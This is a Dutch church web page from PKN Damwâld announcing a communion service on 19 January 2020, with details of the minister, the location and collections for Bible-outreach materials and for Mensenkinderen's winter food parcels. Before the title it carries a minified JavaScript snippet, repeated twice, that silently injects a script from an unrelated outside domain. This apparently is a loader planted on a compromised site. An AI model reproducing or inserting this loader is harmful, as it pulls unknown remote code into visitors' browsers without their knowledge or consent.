;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Viering Heilig Avondmaal - PKN Damwâld
zondag 19 januari 2020
09:30 uur
Viering Heilig Avondmaal

Viering Heilig Avondmaal

Informatie

Voorganger:Ds. G. J. Otter
Mededeling:Viering Heilig Avondmaal
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Een goed verhaal

Collecte Protestantse Kerk – Missionair – Nederland - een goed verhaal
Het thema van de Protestantse Kerk voor het seizoen 2019/2020 is “Een goed verhaal”. In de kerk leven we vanuit het goede verhaal dat de Bijbel ons vertelt. Voor velen een bron van troost, bemoediging en inspiratie. Maar ook een boek dat cultureel en maatschappelijk relevant is. In de dienst, in gespreksgroepen, tijdens catechisatie, bij bezoekwerk en op andere plekken zijn kerken bezig met dat goede verhaal. De Protestantse Kerk biedt hiervoor ondersteunend materiaal aan. Daarnaast worden andere initiatieven ontwikkeld om bijbelgebruik te bevorderen, bijvoorbeeld symposia. Collecteer in deze Maand van de Spiritualiteit mee voor het ontwikkelen van materialen en initiatieven die mensen binnen en buiten de kerk uitnodigen om de Bijbel te openen.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Winteractie Mensenkinderen - Hoe komen zij de winter door – vier maanden voedsel
De naderende winter drijven Nadine en haar man tot grote wanhoop: geen werk, geen inkomen, stijgende voedselprijzen en vijf kindermonden te voeden. “Hoe gaan we dat de komende maanden redden? “ vragen ze zich bang af. De winter is voor arme mensen als Nadine een grote vijand. Want winter betekent: kou, honger en gebrek lijden. Elk jaar hoort Nadine dat er mensen sterven t.g.v. honger en kou. Hopelijk gebeurt dat niet in haar gezin. De bange vraag die arme mensen in Albanië, Armenië en Moldavië telkens weer stellen is of ze de wintermaanden kunnen overleven: “Zullen we voldoende eten hebben om de winter door te komen?” Zij voelen zich volledig afhankelijk, van God en van mensen die hulp bieden. Al 16 jaar lang trekt Mensenkinderen zich het lot van deze arme medemensen aan en helpt ze de winter door. Met hulp van lokale (Kerkelijke) vrijwilligers geven ze hen niet één maand, maar vier maanden lang (december t/m maart) een uitgebreid voedselpakket. Wij kunnen ons nauwelijks voorstellen hoe belangrijk die voedselpakketten voor deze mensen zijn. Voor velen is het verschil tussen knagende honger en een gevulde maag.